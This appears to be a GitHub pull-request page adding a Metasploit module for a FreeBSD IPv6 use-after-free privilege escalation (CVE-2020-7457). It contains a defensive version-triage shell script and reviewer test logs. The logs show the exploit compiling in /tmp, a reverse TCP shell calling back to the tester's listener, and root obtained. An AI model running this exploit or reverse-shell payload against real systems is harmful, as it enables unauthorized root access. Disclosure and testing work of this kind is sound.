
Add FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation module #13837

Merged
merged 5 commits into from
Jul 29, 2020

Conversation

@bcoles bcoles commented Jul 9, 2020

This module exploits a race and use-after-free vulnerability in the
FreeBSD kernel IPv6 socket handling. A missing synchronization lock
in the IPV6_2292PKTOPTIONS option handling in setsockopt permits
racing ip6_setpktopt access to a freed ip6_pktopts struct.

This exploit overwrites the ip6po_pktinfo pointer of an ip6_pktopts
struct in freed memory to achieve arbitrary kernel read/write.

This module has been tested successfully on:

  • FreeBSD 9.0-RELEASE #0 (amd64)
  • FreeBSD 9.1-RELEASE #0 r243825 (amd64)
  • FreeBSD 9.2-RELEASE #0 r255898 (amd64)
  • FreeBSD 9.3-RELEASE #0 r268512 (amd64)
  • FreeBSD 12.0-RELEASE r341666 (amd64)
  • FreeBSD 12.1-RELEASE r354233 (amd64)

Resolves #13826
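As an added triage helper (not part of the module, of Metasploit, or of FreeBSD), the POSIX shell functions below classify a `uname -r` release string against the 9.0 to 12.1 kernel range that the release notes tie to CVE-2020-7457, and against the versions listed above as tested. The patch level (`-pN`) is deliberately ignored because this page does not list the patched builds, so a hit means "review this host", not "confirmed vulnerable".

```shell
#!/bin/sh
# Added example: classify a FreeBSD release string such as "12.1-RELEASE-p7".
# Assumption: only major.minor is compared; patch level is not considered
# because the PR does not state which patch levels contain the fix.

# Return 0 if 9.0 <= major.minor <= 12.1, 1 if outside, 2 if unparseable.
ip6_setpktopt_affected_range() {
    # Keep only the leading "major minor" pair ("12.1-RELEASE-p7" -> "12 1").
    mm=$(printf '%s' "$1" | sed -n 's/^\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p')
    [ -n "$mm" ] || return 2
    set -- $mm
    # Encode as one comparable integer: 12.1 -> 1201, 9.0 -> 900.
    code=$(($1 * 100 + $2))
    [ "$code" -ge 900 ] && [ "$code" -le 1201 ] && return 0
    return 1
}

# Versions the module was tested on, taken from the PR description.
TESTED_VERSIONS="9.0 9.1 9.2 9.3 12.0 12.1"

# Return 0 if major.minor of "$1" is in the tested list, 1 otherwise.
ip6_setpktopt_module_tested() {
    mm=$(printf '%s' "$1" | sed -n 's/^\([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    for v in $TESTED_VERSIONS; do
        [ "$v" = "$mm" ] && return 0
    done
    return 1
}

# Print a one-line verdict for one release string.
ip6_setpktopt_triage() {
    ip6_setpktopt_affected_range "$1" && rc=0 || rc=$?
    case "$rc" in
        0)
            if ip6_setpktopt_module_tested "$1"; then
                echo "$1: in CVE-2020-7457 range (module tested on this minor)"
            else
                echo "$1: in CVE-2020-7457 range (untested minor, review manually)"
            fi ;;
        1) echo "$1: outside 9.0-12.1 range" ;;
        *) echo "$1: unparseable release string" ;;
    esac
}

# On a live host: ip6_setpktopt_triage "$(uname -r)"
```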

@bcoles bcoles added the module label Jul 9, 2020
@space-r7 space-r7 added the docs label Jul 13, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Jul 16, 2020
@smcintyre-r7 smcintyre-r7 left a comment

Reviewed and left a few minor change requests; code looks great overall.

@bcoles bcoles requested a review from smcintyre-r7 July 16, 2020 21:05
@smcintyre-r7

Well, testing this from the current branch fails with the following error. If you could rebase this work onto master, that would make testing easier.

msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[-] Exploit failed: NoMethodError undefined method `is_root?' for #<Msf::Modules::Exploit__Freebsd__Local__Ip6_setpktopt_uaf_priv_esc::MetasploitModule:0x000000000b1e24d0>
Did you mean?  is_a?
[*] Exploit completed, but no session was created.

I moved past that though and tested it from a merged state at which point it appears to have failed to compile. The target is a stock FreeBSD 12.0 system with cc installed.

msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] System architecture amd64 is supported
[+] FreeBSD 12.0-RELEASE r341666 GENERIC  appears vulnerable
[+] cc is installed
[+] The target appears to be vulnerable.
[*] Using target: FreeBSD 12.0-RELEASE r341666 - allproc offset: 0x1df3c38
[*] Writing '/tmp/.2Uc72Fr.c' (14162 bytes) ...
[*] Max line length is 131073
[*] Writing 14162 bytes in 1 chunks of 52038 bytes (octal-encoded), using printf
[*] Compiling /tmp/.2Uc72Fr.c ...
[-] error: unable to execute command: Executable "" doesn't exist!
[-] Exploit aborted due to failure: unknown: /tmp/.2Uc72Fr.c failed to compile
[*] Exploit completed, but no session was created.


bcoles commented Jul 22, 2020

> If you could rebase this work onto master that would make testing easier.

No thanks. It is literally a 3-line change. Or just drop the .rb file in master. Rebased.

@bcoles bcoles force-pushed the ip6_setpktopt_uaf_priv_esc branch from 5273c5e to 95b99ce Compare July 26, 2020 08:05
@smcintyre-r7

Alright, tested successfully with a session opened via auxiliary/scanner/ssh/ssh_login. Now this is interesting, because when I tested it via exploit/multi/ssh/sshexec and the bsd/x64/shell_reverse_tcp payload it failed consistently to compile with the error I had mentioned: error: unable to execute command: Executable "" doesn't exist!. Upon further testing it also works with a session opened from cmd/unix/reverse_openssl using sshexec, so I'm thinking it's an issue within the payload and not necessarily the module. Definitely something to be aware of, though.

Testing output
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i -1
[*] Starting interaction with 6...

To see how much disk space is left on your partitions, use

	df -h
		-- Dru <genesis@istar.ca>
id
uid=1001(smcintyre) gid=1001(smcintyre) groups=1001(smcintyre)
^Z
Background session 6? [y/N]  y
msf5 auxiliary(scanner/ssh/ssh_login) > previous 
[*] Using configured payload bsd/x64/shell_reverse_tcp
msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > show options 

Module options (exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on.


Payload options (bsd/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Using target: FreeBSD 12.0-RELEASE r341666 - allproc offset: 0x1df3c38
[*] Writing '/tmp/.GQ8WGbv.c' (14162 bytes) ...
[*] Compiling /tmp/.GQ8WGbv.c ...
[*] Writing '/tmp/.MC4Wn' (218 bytes) ...
[*] Launching exploit (timeout: 30s) ...
[*] uid=0(root) gid=0(wheel) egid=1001(smcintyre) groups=1001(smcintyre)
[+] Success! Executing payload...
[*] Command shell session 7 opened (192.168.159.128:4444 -> 192.168.159.43:23808) at 2020-07-29 15:19:56 -0400
[+] Deleted /tmp/.GQ8WGbv.c
[+] Deleted /tmp/.GQ8WGbv
[+] Deleted /tmp/.MC4Wn

id
uid=0(root) gid=0(wheel) egid=1001(smcintyre) groups=1001(smcintyre)

@smcintyre-r7 smcintyre-r7 merged commit a886177 into rapid7:master Jul 29, 2020

smcintyre-r7 commented Jul 29, 2020

Release Notes

New module exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc facilitates a local privilege escalation via a Use After Free vulnerability in the network stack of FreeBSD kernel versions 9.0 - 12.1 (CVE-2020-7457).

@bcoles bcoles deleted the ip6_setpktopt_uaf_priv_esc branch July 30, 2020 00:13
@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 5, 2020
Successfully merging this pull request may close these issues.

Add FreeBSD 12 'ip6_setpktopt' Kernel Local Privilege Escalation